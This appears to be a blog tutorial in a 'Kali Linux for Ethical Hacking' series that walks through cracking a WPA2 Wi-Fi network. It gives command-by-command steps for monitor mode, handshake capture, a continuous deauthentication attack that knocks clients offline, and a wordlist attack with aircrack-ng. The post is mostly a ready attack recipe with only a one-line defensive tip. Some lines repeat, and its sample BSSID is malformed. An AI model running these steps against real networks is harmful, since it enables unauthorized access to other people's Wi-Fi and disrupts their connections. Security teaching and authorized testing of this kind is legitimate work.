>> Welcome all, to this series
of Kali Linux for Ethical Hacking. This is fourth part and I’ll explain the
process of Breaking Wireless WPA2.
#Tools used:
airmon-ng
airodump-ng
aireplay-ng
aircrack
airodump-ng
aireplay-ng
aircrack
#…Let’s begin
– Before starting, make sure you
have eth0, lo, wlan0 in action. (Go to terminal and run ifconfig)
– Let’s start to monitor on the
wireless interface,
Run:
airmon-ng start wlan0
– After executing above command, we
must get a new interface mon0 (monitor mode enabled)
– Verify that both interfaces are up
and running,
Run:
airmon-ng
– Watch for wlan0 and mon0,
Run :
airodump-ng mon0
– For monitoring all the APs that
Kali Linux OS can find out.
#Next steps
– In this next step, notice ESSID,
BSSID & ENCRYPTION (ENC) of Wireless
(in this case, let’s assume ESSID in nhc-bj, ENC is WPA2 & BSSID is 00:A1:B2:11:20:13:5T)
(in this case, let’s assume ESSID in nhc-bj, ENC is WPA2 & BSSID is 00:A1:B2:11:20:13:5T)
– CTRL+C (press)
Run:
airodump-ng -w FILE -c 1 –bssid
00:A1:B2:11:20:13:5T mon0
(-c is for channel. Channel is 1 for
the BSSID we are trying to connect to, -w is for creating new file with name
FILE). With each step done by the tools, we’ll store them in the FILE we just
created.
– Once you execute the above
command, it starts collecting information and writes it to our file named
“FILE”.
– You can leave it open, so it
collects information. OR, as we discussed in earlier part of this post, you can
carry out de-auth attack.
– For that, open new window and
clone a session. Then execute the de-auth attack process.
Run:
aireplay-ng -0 0 -a
00:A1:B2:11:20:13:5T mon0
(Let it run for 60sec)
– CTRL+C
– Check it out in the other window
that we left open.
– CTRL+C
Run:
ls
(you will get files as FILE-01.cap FILE-01.csv and others)
(you will get files as FILE-01.cap FILE-01.csv and others)
– Now, we use a dictionary attack.
Run:
aircrack-ng FILE-01.cap -w
/pentest/passwords/wordlists/darkc0de.lst
– The process starts for discovering
a Pre-Shared Key (Password).
Conclusion: We can find hidden SSIDs, bypass MAC filters and even can
crack WP2. Now, how to secure is our WiFi? Well, use really strong passwords,
with mixed up contents, so that dictionary attacks would fail to locate it in
itslist.
No comments:
Post a Comment